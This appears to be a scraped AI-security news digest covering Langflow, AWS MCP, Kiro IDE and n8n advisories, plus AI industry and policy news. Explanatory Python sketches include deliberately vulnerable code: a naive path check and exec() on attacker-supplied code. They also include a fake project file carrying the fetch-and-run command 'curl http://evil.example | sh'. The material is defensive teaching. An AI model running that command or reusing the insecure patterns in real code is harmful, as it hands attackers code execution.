aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,649
Last 24 hours: 0
Last 7 days: 157
Daily Briefing: Saturday, March 28, 2026

OpenAI Shuts Down Sora Video App Over Profitability Concerns: OpenAI discontinued its Sora video-generation app and canceled a $1 billion Disney partnership because the service consumed too many computational resources without generating enough revenue to justify its costs as the company prioritizes profitability.

Critical Injection Vulnerability in localGPT LLM Tool: CVE-2026-5002 allows remote injection attacks (inserting malicious code into input) through the LLM Prompt Handler in PromtEngineer localGPT's backend. Exploit code is publicly available, and the vendor has not responded to disclosure attempts.

Political Deepfakes Gain Influence Despite Public Awareness: AI researchers found that creators use generative AI (technology that creates images or videos from text descriptions) to produce fake media of political figures for propaganda and profit, and these deepfakes shape public perception even when viewers know the content is fake.

TikTok's AI Ad Labels Failing in Practice: Major companies like Samsung are posting AI-generated ads on TikTok without the required disclosure labels, so users cannot tell whether an advertisement was created by AI or a human despite platform policies requiring transparency.

Critical This Week: 5 issues

critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873, NVD/CVE Database, Mar 27, 2026

Latest Intel

01

Nvidia CEO Jensen Huang says OpenClaw is 'definitely the next ChatGPT'

industry
Mar 17, 2026

Nvidia CEO Jensen Huang highlighted OpenClaw, an open-source autonomous AI agent platform (a system that can complete tasks and make decisions with minimal human input, unlike traditional chatbots), calling it "the next ChatGPT" and a major breakthrough in AI interaction. Nvidia launched NemoClaw, an enterprise version of OpenClaw that adds security, scalability, and oversight tools to make these autonomous agents safe for real-world business use, addressing concerns about security, privacy, and control as these systems gain the ability to act independently.

Fix: Nvidia addressed risks with NemoClaw by building "guardrails, including privacy protections, oversight tools, and enterprise-grade security to ensure these agents can be deployed safely at scale."

CNBC Technology
02

The Pentagon is planning for AI companies to train on classified data, defense official says

policysecurity
Mar 17, 2026

The Pentagon is planning to let AI companies train their models on classified military data in secure facilities, which would allow the AI to learn from and embed sensitive intelligence like surveillance reports. While this could make AI systems more accurate for military tasks, experts warn it creates risks: classified information that the AI learns could accidentally be shared with people or military departments that shouldn't have access to it, potentially endangering operatives or exposing secrets.

MIT Technology Review
03

OpenAI preps for IPO by end of year, tells employees ChatGPT must be 'productivity tool'

industry
Mar 17, 2026

OpenAI is preparing for an initial public offering (IPO, where a private company sells shares to the public) potentially by the end of 2026, with leadership telling employees that ChatGPT must focus on being a productivity tool for businesses. The company is shifting strategy to convert its 900 million weekly users into enterprise customers and has scaled back its infrastructure spending targets from $1.4 trillion to $600 billion by 2030 to present a more realistic financial picture to investors.

CNBC Technology
04

GHSA-2cpp-j2fc-qhp7: AWS API MCP File Access Restriction Bypass

security
Mar 17, 2026

The AWS API MCP Server (a tool that lets AI assistants interact with AWS services) has a vulnerability in versions 0.2.14 through 1.3.8 where attackers can bypass file access restrictions and read files they shouldn't be able to access, even when the server is configured to block file operations or limit them to a specific directory.

Fix: Upgrade to version 1.3.9 or later.

GitHub Advisory Database
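The advisory above describes a classic bug class: a file-access restriction that can be bypassed even when a base directory is configured. A minimal sketch of how such bypasses typically work, assuming a naive string-prefix check (the function names, directory, and check logic here are illustrative and are not taken from the AWS API MCP Server codebase):

```python
# Illustrative sketch of the bug class behind GHSA-2cpp-j2fc-qhp7: a naive
# prefix check on the raw path string can be bypassed with "..", while
# resolving the path first closes that hole. All names are hypothetical.
import os.path

ALLOWED_DIR = "/srv/mcp-workdir"

def naive_is_allowed(path: str) -> bool:
    # Broken: checks the raw string, so "/srv/mcp-workdir/../etc/passwd"
    # passes (and so would "/srv/mcp-workdir-evil/x").
    return path.startswith(ALLOWED_DIR)

def resolved_is_allowed(path: str) -> bool:
    # Safer: normalize and resolve symlinks, then compare directories.
    real = os.path.realpath(path)
    return os.path.commonpath([real, ALLOWED_DIR]) == ALLOWED_DIR

escape = "/srv/mcp-workdir/../etc/passwd"
print(naive_is_allowed(escape))     # True  -- restriction bypassed
print(resolved_is_allowed(escape))  # False -- traversal caught
```

Whether this specific mechanism is the one in the advisory is not stated in the digest; the sketch only shows why "limit to a specific directory" checks need path resolution to be meaningful.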
05

GHSA-vwmf-pq79-vjvx: Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint

security
Mar 17, 2026

Langflow has an unauthenticated remote code execution vulnerability in its public flow build endpoint. The endpoint is designed to be public but incorrectly accepts attacker-supplied flow data containing arbitrary Python code, which gets executed without sandboxing when the flow is built. An attacker only needs to know a public flow's ID and can exploit this to run any code on the server.

GitHub Advisory Database
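The Langflow advisory describes the general pattern of a build endpoint executing code embedded in request data. A hedged sketch of that pattern and the usual mitigation, assuming a JSON flow with `nodes` entries (the field names and registry design are illustrative, not Langflow's actual schema):

```python
# Hypothetical sketch of the vulnerability class in GHSA-vwmf-pq79-vjvx: a
# build step that exec()s code strings from user-supplied flow data gives an
# attacker remote code execution. Safer servers instantiate only node types
# registered server-side and never execute request-supplied code.
def build_flow_unsafe(flow: dict) -> dict:
    env: dict = {}
    for node in flow["nodes"]:
        exec(node["code"], env)   # attacker-controlled string -> RCE
    return env

def build_flow_checked(flow: dict, registry: dict) -> list:
    built = []
    for node in flow["nodes"]:
        kind = node["type"]
        if kind not in registry:
            raise ValueError(f"unknown node type: {kind}")
        # Only server-defined constructors run; params are passed as data.
        built.append(registry[kind](node.get("params", {})))
    return built
```

With a one-entry registry such as `{"echo": lambda params: params}`, `build_flow_checked({"nodes": [{"type": "echo", "params": {"x": 1}}]}, registry)` returns `[{"x": 1}]`, while any unregistered node type is rejected instead of executed.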
06

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

industry
Mar 17, 2026

OpenAI released two new smaller AI models, GPT-5.4 mini and GPT-5.4 nano, that are cheaper and faster than previous versions. GPT-5.4 nano is particularly affordable at $0.20 per million input tokens, making it economical for tasks like image description, where describing 76,000 photos would cost around $52.

Simon Willison's Weblog
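The quoted price and total are consistent with each other under an assumption about per-photo token counts. A back-of-envelope check, assuming roughly 3,400 input tokens per photo (image tokens plus prompt; this figure is an assumption, not from the post):

```python
# Sanity check of the pricing claim: GPT-5.4 nano at $0.20 per million input
# tokens, 76,000 photos, ~3,400 assumed input tokens per photo.
price_per_token = 0.20 / 1_000_000
tokens_per_photo = 3_400          # assumption for illustration
photos = 76_000
total = photos * tokens_per_photo * price_per_token
print(f"${total:.2f}")            # prints $51.68, in line with the quoted ~$52
```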
07

Nvidia NemoClaw promises to run OpenClaw agents securely

securityindustry
Mar 17, 2026

OpenClaw, a framework for running AI agents (autonomous programs that can take actions) locally on devices rather than in the cloud, has faced security concerns since its rapid rise in early 2026. Nvidia announced NemoClaw, which addresses these vulnerabilities by using OpenShell, a security layer that includes kernel-level sandboxing (isolating programs from the core system) and a privacy router that monitors and blocks unauthorized data transfers by OpenClaw.

Fix: NemoClaw's OpenShell runtime isolates OpenClaw using kernel-level sandboxing and a 'privacy router' that monitors OpenClaw's behavior and communication with other systems, stepping in to block actions if it detects OpenClaw sending sensitive data somewhere it shouldn't. OpenShell is fully open source.

CSO Online
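The "privacy router" idea above, blocking an agent's outbound traffic when it carries sensitive data or targets an unexpected destination, can be sketched as a simple egress filter. This is purely illustrative and is not NemoClaw's or OpenShell's actual design; the allowlist and secret markers are assumptions:

```python
# Minimal egress-filter sketch of a "privacy router": inspect an agent's
# outbound request and block it if the destination host is not allowlisted
# or the payload contains a known secret. Hypothetical policy values.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.internal.example", "telemetry.example"}  # assumed policy

def egress_allowed(url: str, payload: str, secrets: set) -> bool:
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        return False              # unknown destination: block
    if any(s in payload for s in secrets):
        return False              # known secret in payload: block
    return True

secrets = {"AKIA_FAKE_KEY"}
print(egress_allowed("https://api.internal.example/log", "ok", secrets))       # True
print(egress_allowed("https://evil.example/x", "ok", secrets))                 # False
```

A real implementation would sit at the network layer and handle encoding and exfiltration tricks (chunking, base64) that a substring check misses; the sketch only shows the policy shape.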
08

llm 0.29

industry
Mar 17, 2026

This is a monthly briefing about LLM (large language model) developments from March 2026, curated by Simon Willison. The content appears to be a sponsorship announcement for a paid email digest service rather than a discussion of a specific AI issue or vulnerability.

Simon Willison's Weblog
09

Arbitrary code execution via crafted project files in Kiro IDE

security
Mar 17, 2026

Kiro IDE, an AI-powered development environment for building autonomous software agents, has a vulnerability (CVE-2026-4295) that allows arbitrary code execution (running unintended commands on a system) when users open malicious project files. The flaw exists in versions before 0.8.0 due to improper trust boundary enforcement (failing to verify that data comes from a safe source).

AWS Security Bulletins
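The "improper trust boundary enforcement" described above is the pattern where an IDE auto-executes commands declared in an opened project file. A hedged sketch of the failure and the usual fix, requiring explicit user trust before any project-declared task can run (the file format and field names are hypothetical, not Kiro IDE's actual schema):

```python
# Illustrative sketch of the trust-boundary bug class behind CVE-2026-4295:
# a project file is untrusted input, so startup tasks it declares must not
# run until the user explicitly trusts the project. Schema is hypothetical.
import json

def load_project(raw: str, trusted: bool) -> list:
    project = json.loads(raw)
    tasks = project.get("on_open_tasks", [])
    if tasks and not trusted:
        # Enforce the boundary: surface the tasks to the user, never auto-run.
        raise PermissionError("project declares startup tasks but is untrusted")
    return tasks

malicious = json.dumps({"on_open_tasks": ["curl http://evil.example | sh"]})
# Tasks are returned for execution only because the user opted in:
print(load_project(malicious, trusted=True))
```

Opening the same file with `trusted=False` raises `PermissionError` instead of handing the attacker's command to a shell, which is the behavior the 0.8.0 fix class aims for.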
10

What the EU AI Act Means for Staffing Businesses

policy
Mar 17, 2026

The EU AI Act, effective August 2, 2026, classifies AI systems used in hiring and employment decisions (such as candidate screening, ranking, and performance monitoring) as high-risk and requires businesses that deploy them to conduct risk assessments, perform bias testing, maintain human oversight, and provide transparency disclosures. Staffing companies, recruitment platforms, and workforce intermediaries are responsible for compliance even if they did not build the technology, and this obligation applies globally if the AI system affects anyone in the EU.

EU AI Act Updates
Critical This Week (continued)

critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm
CSO Online, Mar 27, 2026

critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability
CVE-2025-53521, CISA Known Exploited Vulnerabilities, Mar 26, 2026

critical

CISA: New Langflow flaw actively exploited to hijack AI workflows
BleepingComputer, Mar 26, 2026

critical

GHSA-mxrg-77hm-89hv: n8n: Prototype Pollution in XML and GSuiteAdmin node parameters lead to RCE
CVE-2026-33696, GitHub Advisory Database, Mar 26, 2026